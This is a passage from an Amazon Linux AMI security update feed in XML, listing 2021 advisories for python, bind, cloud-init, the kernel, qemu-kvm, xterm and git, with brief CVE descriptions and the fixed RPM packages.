release="1.61.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/subversion-python26-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.9.7" release="1.61.amzn1" epoch="0" 
arch="i686"><filename>Packages/subversion-debuginfo-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.9.7-1.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1484</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1484: medium priority package update for python27 python36 python38</title><issued date="2021-02-23 20:18:00" /><updated date="2021-02-24 19:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3177:
A flaw was found in python. A stack-based buffer overflow was discovered in the ctypes module provided within Python. Applications that use ctypes without carefully validating the input passed to it may be vulnerable to this flaw, which would allow an attacker to overflow a buffer on the stack and crash the application. The highest threat from this vulnerability is to system availability.
1918168: CVE-2021-3177 python: stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3177" title="" id="CVE-2021-3177" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python38-test" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-test-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-libs-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-tools-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-devel-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debuginfo-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debug-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-libs-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-devel-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.5.amzn1" epoch="0" 
arch="i686"><filename>Packages/python38-debuginfo-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debug-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-test-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-tools-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.141.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.141.amzn1" epoch="0" 
arch="i686"><filename>Packages/python27-test-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.141.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.141.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.141.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.141.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.20.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/python36-test-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.12-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1485</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1485: important priority package update for bind</title><issued date="2021-03-18 17:22:00" /><updated date="2021-03-19 22:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8625:
A buffer overflow flaw was found in the SPNEGO implementation used by BIND. This flaw allows a remote attacker to cause the named process to crash or possibly perform remote code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1928486: CVE-2020-8625 bind: Buffer overflow in the SPNEGO implementation affecting GSSAPI security policy negotiation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8625" title="" id="CVE-2020-8625" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1486</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1486: medium priority package update for cloud-init</title><issued date="2021-03-18 17:22:00" /><updated date="2021-03-19 22:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3429:
99999:
CVE-2020-8632:
A flaw was found in cloud-init, where it uses short passwords when generating a random password in new instances. Depending on the instance configuration, a remote or local attacker may abuse this vulnerability to guess the password of the victim user.
1798728: CVE-2020-8632 cloud-init: Too short random password length in cc_set_password in config/cc_set_passwords.py
CVE-2020-8631:
A flaw was found in cloud-init, where it uses the random.choice function when creating sensitive random strings used for generating a random password in new instances. Depending on the instance configuration, a remote or local attacker may abuse this vulnerability to guess the password of the victim user.
1798731: CVE-2020-8631 cloud-init: Use of random.choice when generating random password
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8631" title="" id="CVE-2020-8631" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8632" title="" id="CVE-2020-8632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3429" title="" id="CVE-2021-3429" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cloud-init" version="0.7.6" release="43.23.amzn1" epoch="0" arch="noarch"><filename>Packages/cloud-init-0.7.6-43.23.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1487</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1487: important priority package update for kernel</title><issued date="2021-03-18 17:29:00" /><updated date="2021-03-19 23:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-28038:
An issue was discovered in the Linux kernel through 5.11.3, as used with Xen PV. A certain part of the netback driver lacks necessary treatment of errors such as failed memory allocations (as a result of changes to the handling of grant mapping errors). A host OS denial of service may occur during misbehavior of a networking frontend driver. NOTE: this issue exists because of an incomplete fix for CVE-2021-26931.
CVE-2021-27365:
A flaw was found in the Linux kernel. A heap buffer overflow in the iSCSI subsystem is triggered by setting an iSCSI string attribute to a value larger than one page and then trying to read it. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1930078: CVE-2021-27365 kernel: heap buffer overflow in the iSCSI subsystem
CVE-2021-27364:
A flaw was found in the Linux kernel. An out-of-bounds read was discovered in the libiscsi module that could lead to reading kernel memory or a crash. The highest threat from this vulnerability is to data confidentiality as well as system availability.
1930080: CVE-2021-27364 kernel: out-of-bounds read in libiscsi module
CVE-2021-27363:
A flaw was found in the way access to sessions and handles was handled in the iSCSI driver in the Linux kernel. A local user could use this flaw to leak iSCSI transport handle kernel address or end arbitrary iSCSI connections on the system.
1930079: CVE-2021-27363 kernel: iscsi: unrestricted access to sessions and handles
CVE-2021-26932:
An issue was discovered in the Linux kernel 3.2 through 5.10.16, as used by Xen. Grant mapping operations often occur in batch hypercalls, where a number of operations are done in a single hypercall, the success or failure of each one is reported to the backend driver, and the backend driver then loops over the results, performing follow-up actions based on the success or failure of each operation. Unfortunately, when running in PV mode, the Linux backend drivers mishandle this: Some errors are ignored, effectively implying their success from the success of related batch elements. In other cases, errors resulting from one batch element lead to further batch elements not being inspected, and hence successful ones to not be possible to properly unmap upon error recovery. Only systems with Linux backends running in PV mode are vulnerable. Linux backends running in HVM / PVH modes are not vulnerable. This affects arch/*/xen/p2m.c and drivers/xen/gntdev.c.
CVE-2021-26931:
An issue was discovered in the Linux kernel 2.6.39 through 5.10.16, as used in Xen. Block, net, and SCSI backends consider certain errors a plain bug, deliberately causing a kernel crash. For errors potentially being at least under the influence of guests (such as out of memory conditions), it isn't correct to assume a plain bug. Memory allocations potentially causing such crashes occur only when Linux is running in PV mode, though. This affects drivers/block/xen-blkback/blkback.c and drivers/xen/xen-scsiback.c.
CVE-2021-26930:
An issue was discovered in the Linux kernel 3.11 through 5.10.16, as used by Xen. To service requests to the PV backend, the driver maps grant references provided by the frontend. In this process, errors may be encountered. In one case, an error encountered earlier might be discarded by later processing, resulting in the caller assuming successful mapping, and hence subsequent operations trying to access space that wasn't mapped. In another case, internal state would be insufficiently updated, preventing safe recovery from the error. This affects drivers/block/xen-blkback/blkback.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26930" title="" id="CVE-2021-26930" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26931" title="" id="CVE-2021-26931" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26932" title="" id="CVE-2021-26932" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27363" title="" id="CVE-2021-27363" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27364" title="" id="CVE-2021-27364" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27365" title="" id="CVE-2021-27365" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28038" title="" id="CVE-2021-28038" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.225" release="121.357.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-headers-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.225" 
release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.225-121.357.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1488</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1488: medium priority package update for qemu-kvm</title><issued date="2021-03-18 17:30:00" /><updated date="2021-03-19 22:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-16092:
An assertion failure flaw was found in QEMU in the network packet processing component. This issue affects the "e1000e" and "vmxnet3" network devices. This flaw allows a malicious guest user or process to abort the QEMU process on the host, resulting in a denial of service.
1860283: CVE-2020-16092 QEMU: reachable assertion failure in net_tx_pkt_add_raw_fragment() in hw/net/net_tx_pkt.c
CVE-2020-13765:
An out-of-bounds write access flaw was found in the way QEMU loads ROM contents at boot time. This flaw occurs in the rom_copy() routine while loading the contents of a 32-bit -kernel image into memory. Running an untrusted -kernel image may load contents at arbitrary memory locations, potentially leading to code execution with the privileges of the QEMU process.
1842912: CVE-2020-13765 QEMU: loader: OOB access while loading registered ROM may lead to code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13765" title="" id="CVE-2020-13765" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16092" title="" id="CVE-2020-16092" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-tools" version="1.5.3" release="156.26.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.26.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="156.26.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.26.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.26.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.26.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.26.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.26.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.26.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.26.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1489</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1489: important priority package update for xterm</title><issued date="2021-03-18 17:30:00" /><updated date="2021-03-19 22:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-27135:
A flaw was found in xterm. A specially crafted sequence of combining characters causes an out of bounds write leading to arbitrary code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1927559: CVE-2021-27135 xterm: crash when processing combining characters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27135" title="" id="CVE-2021-27135" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xterm" version="295" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/xterm-295-3.15.amzn1.x86_64.rpm</filename></package><package name="xterm-debuginfo" version="295" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/xterm-debuginfo-295-3.15.amzn1.x86_64.rpm</filename></package><package name="xterm" version="295" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/xterm-295-3.15.amzn1.i686.rpm</filename></package><package name="xterm-debuginfo" version="295" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/xterm-debuginfo-295-3.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1490</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1490: medium priority package update for git</title><issued date="2021-03-23 22:59:00" /><updated date="2021-03-25 19:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-21300:
Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaround, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.6.
1935158: CVE-2021-21300 git: remote code execution during clone operation on case-insensitive filesystems
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21300" title="" id="CVE-2021-21300" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Git" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-subtree" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git-cvs" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.18.5" release="2.73.amzn1" epoch="0" 
